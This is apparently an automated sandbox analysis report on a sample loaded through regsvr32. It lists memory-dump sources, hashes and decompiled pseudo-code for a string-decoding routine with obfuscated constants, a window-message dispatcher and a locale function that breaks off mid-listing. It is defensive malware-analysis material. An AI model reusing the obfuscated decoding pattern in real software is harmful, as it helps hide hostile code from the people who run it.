0x003cc194
0x003cc379
0x003cc19a
0x003cc19c
0x003cc229
0x003cc235
0x003cc23d
0x003cc245
0x003cc24d
0x003cc255
0x003cc25d
0x003cc265
0x003cc26d
0x003cc275
0x003cc27d
0x003cc285
0x003cc28d
0x003cc292
0x003cc2ab
0x003cc2b0
0x003cc2b3
0x00000000
0x003cc1a2
0x003cc1a7
0x003cc1f5
0x003cc202
0x003cc206
0x003cc21d
0x003cc222
0x00000000
0x003cc1a9
0x003cc1ab
0x003cc1bc
0x003cc1cc
0x003cc1cf
0x003cc1d3
0x003cc1db
0x003cc1ec
0x003cc1ee
0x00000000
0x003cc1ad
0x003cc1b2
0x00000000
0x003cc1b8
0x003cc1b8
0x00000000
0x003cc1b8
0x003cc1b2
0x003cc1ab
0x003cc1a7
0x003cc19c
0x003cc194
0x003cc37c
0x003cc387
0x003cc387
0x003cc2e4
0x003cc2f5
0x003cc2f8
0x003cc2fc
0x003cc304
0x003cc30c
0x003cc314
0x003cc31a
0x003cc31b
0x003cc321
0x003cc329
0x003cc331
0x003cc343
0x003cc347
0x003cc353
0x003cc35b
0x003cc362
0x003cc367
0x003cc367
0x00000000

Strings

W, xrefs: 003CC235
{3, xrefs: 003CC255
UQ, xrefs: 003CC314

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: UQ$W${3
API String ID: 0-3720604072
Opcode ID: 645341532e0fe071d078c25c23a20e52c57d32224d8ab3d4c320b537763fb0d1
Instruction ID: 7a707029467dd89f273ae10f6131da28193a6d2ce1cdc5ca2219e67887abaffe
Opcode Fuzzy Hash: 645341532e0fe071d078c25c23a20e52c57d32224d8ab3d4c320b537763fb0d1
Instruction Fuzzy Hash: AF51987150C3428BC719CE29E88492BBBE1FBD5784F154D2EF199D6261D3B4CA4D8B83

Uniqueness

Uniqueness Score: -1.00%

Function 003CD933 Relevance: 3.9, Strings: 3, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003CD933(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int* _t74;
				signed int* _t96;
				signed int* _t97;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				unsigned int _t107;
				unsigned int _t108;
				void* _t118;
				signed int _t120;
				void* _t121;
				unsigned int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				unsigned int _t132;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t74 = E003C2528(_a4);
				_t99 =  *_t74;
				_t4 =  &(_t74[1]); // 0x4
				_t96 = _t4;
				_v12 = 0x5b432;
				_t120 =  *_t96 ^ _t99;
				_v8 = 0x9483d;
				_t97 =  &(_t96[1]);
				_v4 = 0xfdb95;
				_a4 = 0x95b014;
				_v20 = _t99;
				_v16 = _t120;
				_a4 = _a4 * 0x76;
				_a4 = _a4 >> 0xd;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x27f90001;
				_v28 = 0xc896a5;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x44b52804;
				_t123 = _a4 + _t120;
				if((_v28 - 0x00000001 & _a4 + _t120) != 0) {
					_t123 = (_t123 &  !(_v28 - 1)) + _v28;
					_t132 = _t123;
				}
				_v28 = 0x6b9d86;
				_v28 = _v28 + 0xe3e2;
				_v28 = _v28 + 0x594f;
				_v28 = _v28 ^ 0x006a4f7d;
				_a4 = 0x986aa6;
				_a4 = _a4 ^ 0x12a06023;
				_t102 = 0x22;
				_push(_t102);
				_a4 = _a4 / _t102;
				_a4 = _a4 >> 1;
				_a4 = _a4 ^ 0x004ccf50;
				_v24 = 0xc62b31;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x00055c15;
				_push(_t102);
				_t127 = E003C8D52(_t102, _t123 + _t123, _t132);
				_a4 = _t127;
				if(_t127 != 0) {
					_t125 = _t127;
					_t118 =  >  ? 0 :  &(_t97[_t123 >> 2]) - _t97 + 3 >> 2;
					if(_t118 != 0) {
						_t128 = _v20;
						_t121 = 0;
						do {
							_t106 =  *_t97;
							_t97 =  &(_t97[1]);
							_t107 = _t106 ^ _t128;
							 *_t125 = _t107 & 0x000000ff;
							_t125 = _t125 + 8;
							 *((short*)(_t125 - 6)) = _t107 >> 0x00000008 & 0x000000ff;
							_t108 = _t107 >> 0x10;
							_t121 = _t121 + 1;
							 *((short*)(_t125 - 4)) = _t108 & 0x000000ff;
							 *((short*)(_t125 - 2)) = _t108 >> 0x00000008 & 0x000000ff;
						} while (_t121 < _t118);
						_t120 = _v16;
						_t127 = _a4;
					}
					 *((short*)(_t127 + _t120 * 2)) = 0;
				}
				return _t127;
			}

0x003cd93e
0x003cd942
0x003cd946
0x003cd947
0x003cd948
0x003cd949
0x003cd94e
0x003cd950
0x003cd950
0x003cd958
0x003cd960
0x003cd962
0x003cd96a
0x003cd96d
0x003cd975
0x003cd982
0x003cd986
0x003cd98a
0x003cd98e
0x003cd993
0x003cd998
0x003cd9a0
0x003cd9a8
0x003cd9ad
0x003cd9c4
0x003cd9c8
0x003cd9d3
0x003cd9d3
0x003cd9d3
0x003cd9d7
0x003cd9e1
0x003cd9e9
0x003cd9f1
0x003cd9f9
0x003cda01
0x003cda0f
0x003cda12
0x003cda13
0x003cda1a
0x003cda1e
0x003cda26
0x003cda2e
0x003cda33
0x003cda47
0x003cda4d
0x003cda4f
0x003cda57
0x003cda61
0x003cda6f
0x003cda74
0x003cda76
0x003cda7a
0x003cda7c
0x003cda7c
0x003cda7e
0x003cda81
0x003cda86
0x003cda8e
0x003cda94
0x003cda98
0x003cdaa1
0x003cdaa2
0x003cdaa9
0x003cdaad
0x003cdab1
0x003cdab5
0x003cdab5
0x003cdabb
0x003cdabb
0x003cdac9

Strings

}Oj, xrefs: 003CD9D3, 003CD9B9, 003CD9CA
=H, xrefs: 003CD962
}Oj, xrefs: 003CD9F1

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =H$}Oj$}Oj
API String ID: 0-3712439308
Opcode ID: 1c6f4d5ccd9ec579aa8d963b7fc2ddd5de7cb310f0a6d874154f4ee705c023a7
Instruction ID: f84e5d84cb3a99b85085910efb569acc9b26e1db3a8d9fd84edc455acc5a2ec5
Opcode Fuzzy Hash: 1c6f4d5ccd9ec579aa8d963b7fc2ddd5de7cb310f0a6d874154f4ee705c023a7
Instruction Fuzzy Hash: 9D4156761183829BC748DF19C88581BBBE1FFD4314F855E2EF88687260D7B5E908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 10042F7D Relevance: 3.4, APIs: 2, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E10042F7D(intOrPtr* __ecx) {
				signed int _t137;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				intOrPtr _t150;
				signed int _t151;
				signed int* _t152;
				signed char _t155;
				unsigned int _t159;
				unsigned int _t167;
				void* _t168;
				signed int _t172;
				signed int* _t176;
				unsigned int _t178;
				intOrPtr* _t179;
				unsigned int _t180;
				intOrPtr* _t181;
				signed int _t186;
				unsigned int _t191;
				unsigned int _t203;
				void* _t205;

				_t182 = __ecx;
				E1001A9E0(0x1007658c, _t205);
				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
				_t172 =  *(_t205 + 8);
				_t200 = __ecx;
				if(_t172 != 0x111) {
					if(_t172 != 0x4e) {
						_t203 =  *(_t205 + 0x10);
						if(_t172 == 6) {
							E10041CE0(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E10041F78(_t205, _t203));
						}
						if(_t172 != 0x20 || E10041D41(_t200, _t203, _t203 >> 0x10) == 0) {
							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
							 *(_t205 - 0x14) = _t137;
							E10064CD8(7);
							_t186 =  *(_t205 + 8);
							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
							_t176 = 0x10092eb0 + _t140 * 4;
							_t141 =  *(_t205 - 0x14);
							if(_t186 !=  *(0x10092eb0 + _t140 * 4) || _t141 != _t176[2]) {
								 *_t176 = _t186;
								_t176[2] = _t141;
								if(_t141 == 0) {
									L29:
									_t176[1] = _t176[1] & 0x00000000;
									E10064D48(7);
									goto L30;
								}
								L20:
								while(1) {
									if(_t186 >= 0xc000) {
										_t145 = E10042EE4( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
										 *(_t205 + 0x10) = _t145;
										if(_t145 == 0) {
											L28:
											_t147 =  *( *(_t205 - 0x14));
											 *(_t205 - 0x14) = _t147;
											if(_t147 != 0) {
												_t141 =  *(_t205 - 0x14);
												_t186 =  *(_t205 + 8);
												continue;
											}
											goto L29;
										}
										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
											_t159 = E10042EE4(_t145 + 0x18, 0xc000, 0, 0);
											 *(_t205 + 0x10) = _t159;
											if(_t159 != 0) {
												_t145 =  *(_t205 + 0x10);
												continue;
											}
											goto L28;
										}
										_t176[1] = _t145;
										E10064D48(7);
										_t180 =  *(_t205 + 0x10);
										goto L96;
									}
									_t148 = E10042EE4( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
									 *(_t205 + 0x10) = _t148;
									if(_t148 != 0) {
										_t176[1] = _t148;
										E10064D48(7);
										_t178 =  *(_t205 + 0x10);
										goto L33;
									}
									goto L28;
								}
							} else {
								_t178 = _t176[1];
								 *(_t205 + 0x10) = _t178;
								E10064D48(7);
								if(_t178 == 0) {
									L30:
									goto L31;
								}
								if( *(_t205 + 8) < 0xc000) {
									L33:
									_t191 =  *(_t205 + 0x10);
									_t179 =  *((intOrPtr*)(_t178 + 0x14));
									_t150 =  *((intOrPtr*)(_t191 + 0x10));
									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
										_t155 = GetVersion();
										asm("sbb eax, eax");
										_t150 = (_t155 & 0x000000f0) + 0x2f;
									}
									_t151 = _t150 - 1;
									if(_t151 > 0x30) {
										goto L100;
									} else {
										switch( *((intOrPtr*)(_t151 * 4 +  &M1004342B))) {
											case 0:
												_push( *((intOrPtr*)(_t205 + 0xc)));
												_push(L1004E61D());
												goto L52;
											case 1:
												_push( *(__ebp + 0xc));
												goto L52;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E10041F78(__ebp,  *(__ebp + 0xc));
												goto L55;
											case 3:
												__ecx = __ebp - 0x24;
												L1004E57B(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E10041B57(__ebp - 0x60);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x44) = __eax;
												__eax = E10041F9F();
												if(__eax == 0) {
													__eax =  *(__edi + 0x34);
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E1003F471(__eax + 0x20,  *(__ebp - 0x44));
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x60;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												__ecx = __edi;
												_push(__ebp - 0x24);
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__eax = E10042632(__ebp - 0x60);
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												goto L48;
											case 4:
												__ecx = __ebp - 0x24;
												L1004E57B(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__ecx = __ebp - 0x24;
												L48:
												__eax = L1004E6B0(__ecx);
												goto L100;
											case 5:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10041F78(__ebp, __esi);
												goto L54;
											case 6:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L83;
											case 7:
												_push(__esi);
												L52:
												_t154 =  *_t179();
												goto L99;
											case 8:
												L97:
												_push(_t203);
												_push( *((intOrPtr*)(_t205 + 0xc)));
												goto L98;
											case 9:
												_push(__esi);
												_push(E10047849());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L54:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L55:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0xa:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0xb:
												_push( *(__ebp + 0xc));
												goto L86;
											case 0xc:
												_push(__esi);
												goto L80;
											case 0xd:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L59;
											case 0xe:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L90;
											case 0xf:
												_push(E10041F78(__ebp,  *(__ebp + 0xc)));
												_push(E10041F78(__ebp, __esi));
												__eax = 0;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												goto L62;
											case 0x10:
												_push( *(__ebp + 0xc));
												__eax = L1004E61D();
												goto L64;
											case 0x11:
												_push( *(__ebp + 0xc));
												__eax = E10047849();
												goto L64;
											case 0x12:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E10047849();
												goto L62;
											case 0x13:
												_push( *(__ebp + 0xc));
												goto L69;
											case 0x14:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x15:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												__eax = E10041F78(__ebp,  *(__ebp + 0xc));
												goto L62;
											case 0x16:
												_push(__esi);
												__eax = E10041F78(__ebp,  *(__ebp + 0xc));
												L59:
												_push(__eax);
												goto L81;
											case 0x17:
												_push(E10041F78(__ebp, __esi));
												L80:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10041F78(__ebp, __esi);
												goto L88;
											case 0x19:
												__eax =  *(__ebp + 0xc);
												__edx = __ax;
												__eax =  *(__ebp + 0xc) >> 0x10;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												__eax = __ax;
												 *(__ebp + 0xc) = __eax;
												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
													_push(__eax);
													_push(__edx);
													L81:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L100;
												}
												_push(E10041F78(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L91;
											case 0x1a:
												_push(__esi);
												goto L86;
											case 0x1b:
												_push(__esi);
												__ecx = __edi;
												_push( *(__ebp + 0xc));
												__eax =  *__ebx();
												goto L93;
											case 0x1c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												goto L83;
											case 0x1d:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0x1e:
												goto L100;
											case 0x1f:
												_push(__esi);
												L69:
												__eax = E10041F78(__ebp);
												L64:
												_push(__eax);
												L86:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0x20:
												_push(__esi);
												__eax = E10041F78(__ebp,  *(__ebp + 0xc));
												L83:
												_push(__eax);
												L98:
												_t154 =  *_t181();
												L99:
												 *(_t205 - 0x10) = _t154;
												goto L100;
											case 0x21:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__ecx = __edi;
												__eax =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												if(_t168 != 0) {
													goto L100;
												}
												goto L30;
											case 0x22:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L62:
												_push(__eax);
												goto L91;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L90:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
										}
									}
								}
								L96:
								_t181 =  *((intOrPtr*)(_t180 + 0x14));
								goto L97;
							}
						} else {
							L93:
							 *(_t205 - 0x10) = 1;
							L100:
							_t152 =  *(_t205 + 0x14);
							if(_t152 != 0) {
								 *_t152 =  *(_t205 - 0x10);
							}
							_push(1);
							_pop(0);
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
							return 0;
						}
					}
					_t167 =  *(_t205 + 0x10);
					if( *_t167 == 0) {
						goto L30;
					}
					_push(_t205 - 0x10);
					_push(_t167);
					_push( *((intOrPtr*)(_t205 + 0xc)));
					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
					goto L6;
				}
				_push( *(_t205 + 0x10));
				_push( *((intOrPtr*)(_t205 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
					goto L30;
				}
				goto L93;
			}

0x10042f7d
0x10042f82
0x10042f8a
0x10042f8f
0x10042f9a
0x10042f9c
0x10042fb9
0x10042fe3
0x10042fe9
0x10042ff6
0x10042ff6
0x10042ffe
0x1004301c
0x10043022
0x10043034
0x10043039
0x1004303c
0x10043046
0x1004304d
0x10043050
0x10043080
0x10043082
0x10043085
0x100430fb
0x100430fb
0x10043101
0x00000000
0x10043101
0x00000000
0x1004308f
0x10043096
0x100430b7
0x100430be
0x100430c1
0x100430ef
0x100430f2
0x100430f6
0x100430f9
0x10043089
0x1004308c
0x00000000
0x1004308c
0x00000000
0x100430f9
0x100430c8
0x100430e3
0x100430ea
0x100430ed
0x100430c5
0x00000000
0x100430c5
0x00000000
0x100430ed
0x100433fe
0x10043401
0x10043406
0x00000000
0x10043406
0x100430a0
0x100430a7
0x100430aa
0x1004311b
0x1004311e
0x10043123
0x00000000
0x10043123
0x00000000
0x100430ac
0x10043057
0x10043057
0x1004305c
0x1004305f
0x10043066
0x10043106
0x00000000
0x10043106
0x10043073
0x10043126
0x10043126
0x10043129
0x10043130
0x10043133
0x10043135
0x10043140
0x10043144
0x10043144
0x10043147
0x1004314b
0x00000000
0x10043151
0x10043151
0x00000000
0x10043158
0x10043160
0x00000000
0x00000000
0x10043166
0x00000000
0x00000000
0x10043173
0x10043174
0x10043177
0x1004317b
0x00000000
0x00000000
0x10043193
0x1004319b
0x1004319e
0x100431a2
0x100431a5
0x100431a8
0x100431ad
0x100431af
0x100431b2
0x100431b3
0x100431b7
0x100431ba
0x100431c1
0x100431c3
0x100431c8
0x100431cd
0x100431d0
0x100431d7
0x100431d9
0x100431d9
0x100431d7
0x100431dc
0x100431dc
0x100431df
0x100431e0
0x100431e1
0x100431e4
0x100431e6
0x100431e7
0x100431e9
0x100431ed
0x100431f1
0x100431f5
0x100431f8
0x100431fb
0x10043200
0x10043204
0x00000000
0x00000000
0x10043209
0x10043211
0x10043214
0x10043217
0x1004321a
0x1004321d
0x1004321e
0x10043220
0x10043227
0x10043229
0x1004322d
0x10043231
0x10043234
0x10043237
0x10043237
0x00000000
0x00000000
0x10043244
0x10043247
0x10043249
0x00000000
0x00000000
0x10043253
0x10043256
0x10043257
0x00000000
0x00000000
0x10043260
0x10043261
0x10043263
0x00000000
0x00000000
0x1004340c
0x1004340c
0x1004340d
0x00000000
0x00000000
0x1004326a
0x10043270
0x10043271
0x10043274
0x10043277
0x10043277
0x10043278
0x1004327c
0x1004327c
0x1004327d
0x1004327f
0x00000000
0x00000000
0x10043286
0x10043288
0x00000000
0x00000000
0x1004328f
0x00000000
0x00000000
0x1004337f
0x00000000
0x00000000
0x10043299
0x1004329c
0x1004329f
0x100432a0
0x00000000
0x00000000
0x100432ae
0x100432af
0x00000000
0x00000000
0x100432bf
0x100432c6
0x100432c7
0x100432cc
0x00000000
0x00000000
0x100432d5
0x100432d8
0x00000000
0x00000000
0x100432e3
0x100432e6
0x00000000
0x00000000
0x100432f2
0x100432f3
0x100432f6
0x100432f7
0x100432fa
0x00000000
0x00000000
0x10043301
0x00000000
0x00000000
0x10043313
0x10043314
0x00000000
0x00000000
0x10043319
0x1004331c
0x1004331f
0x10043322
0x10043323
0x10043323
0x10043327
0x00000000
0x00000000
0x1004332e
0x10043332
0x100432a3
0x100432a3
0x00000000
0x00000000
0x10043342
0x10043380
0x10043380
0x00000000
0x00000000
0x10043348
0x1004334b
0x1004334d
0x00000000
0x00000000
0x10043354
0x10043357
0x1004335a
0x10043361
0x10043364
0x10043367
0x1004336a
0x1004337b
0x1004337c
0x10043383
0x10043383
0x10043385
0x00000000
0x10043385
0x10043372
0x10043373
0x10043376
0x00000000
0x00000000
0x1004339f
0x00000000
0x00000000
0x100433cb
0x100433cc
0x100433ce
0x100433d1
0x00000000
0x00000000
0x1004338c
0x1004338f
0x10043392
0x10043395
0x00000000
0x00000000
0x10043399
0x1004339b
0x00000000
0x00000000
0x00000000
0x00000000
0x10043306
0x10043307
0x10043307
0x100432dd
0x100432dd
0x100433a0
0x100433a0
0x100433a2
0x00000000
0x00000000
0x10043185
0x10043189
0x10043396
0x10043396
0x10043410
0x10043412
0x10043414
0x10043414
0x00000000
0x00000000
0x100433dc
0x100433e2
0x100433e3
0x100433e4
0x100433e7
0x100433e9
0x100433ec
0x100433ed
0x100433f1
0x100433f2
0x100433f4
0x10042fd6
0x10042fd8
0x00000000
0x00000000
0x00000000
0x00000000
0x100433a6
0x100433a9
0x100433aa
0x100433ad
0x100433ad
0x100433ae
0x100432cf
0x100432cf
0x00000000
0x00000000
0x100433b7
0x100433ba
0x100433bd
0x100433c0
0x100433c1
0x100433c1
0x100433c2
0x100433c5
0x100433c5
0x100433c7
0x00000000
0x00000000
0x10043151
0x1004314b
0x10043409
0x10043409
0x00000000
0x10043409
0x100433d3
0x100433d3
0x100433d3
0x10043417
0x10043417
0x1004341c
0x10043421
0x10043421
0x10043423
0x10043425
0x10043108
0x1004310e
0x10043116
0x10043116
0x10042ffe
0x10042fbb
0x10042fc1
0x00000000
0x00000000
0x10042fcc
0x10042fcd
0x10042fce
0x10042fd3
0x00000000
0x10042fd3
0x10042f9e
0x10042fa3
0x10042fab
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10042F82
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 10043135

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
Opcode ID: ae64f6d9505ef19d8c63753b580c59ca62a777a5923c07c42cc3d897228f52ec
Instruction ID: 326547e9220a27c7bd68a35764ea3c5fa7356a340c28f29d4b1730beb25f58d3
Opcode Fuzzy Hash: ae64f6d9505ef19d8c63753b580c59ca62a777a5923c07c42cc3d897228f52ec
Instruction Fuzzy Hash: 20E19B74604219AFDF15CF64CC80AAE7BA9EF04250F709539F815EB292DB74EE01DB68

Uniqueness

Uniqueness Score: -1.00%

Function 10026143 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E10026143(void* __ecx, void* __edx, intOrPtr* _a4, short* _a8, intOrPtr _a12) {
				short* _t14;
				void* _t15;
				intOrPtr* _t20;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;
				signed short _t35;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t40;

				_t34 = __edx;
				_t29 = __ecx;
				if( *0x100952ac == 0) {
					if(E10026874() == 0) {
						 *0x100952ac = E100268AA;
					} else {
						 *0x100952ac = GetLocaleInfoA;
					}
				}
				_t36 = _a4;
				if(_t36 == 0) {
					L19:
					E10026773();
				} else {
					 *0x1009529c = _t36;
					if( *_t36 != 0) {
						E100262C0(_t29, _t34, 0x10091d00, 0x40, 0x1009529c);
						_t40 = _t40 + 0xc;
					}
					_t20 = _t36 + 0x40;
					 *0x100952a0 = _t20;
					if(_t20 != 0 &&  *_t20 != 0) {
						E100262C0(_t29, _t34, 0x10091c48, 0x16, 0x100952a0);
						_t20 =  *0x100952a0;
						_t40 = _t40 + 0xc;
					}
					_t33 =  *0x1009529c;
					 *0x100952a4 = 0;
					if(_t33 == 0 ||  *_t33 == 0) {
						__eflags = _t20;
						if(_t20 == 0) {
							goto L19;
						}
						__eflags =  *_t20;
						if(__eflags == 0) {
							goto L19;
						}
						E100266B6(__eflags);
					} else {
						if(_t20 == 0) {
							L15:
							E100265A3(__eflags);
							L20:
							if( *0x100952a4 == 0) {
								L31:
								__eflags = 0;
								return 0;
							}
							_t35 = E1002678D(_t36 + 0x80);
							if(_t35 == 0 || IsValidCodePage(_t35 & 0x0000ffff) == 0 || IsValidLocale( *0x1009528c, 1) == 0) {
								goto L31;
							} else {
								_t14 = _a8;
								if(_t14 != 0) {
									 *_t14 =  *0x1009528c;
									 *((short*)(_t14 + 2)) =  *0x100952a8;
									 *(_t14 + 4) = _t35;
								}
								_t38 = _a12;
								if(_t38 == 0) {
									L30:
									_t15 = 1;
									return _t15;
								} else {
									_push(0x40);
									_push(_t38);
									_push(0x1001);
									_push( *0x1009528c);
									if( *0x100952ac() == 0) {
										goto L31;
									}
									_push(0x40);
									_push(_t38 + 0x40);
									_push(0x1002);
									_push( *0x100952a8);
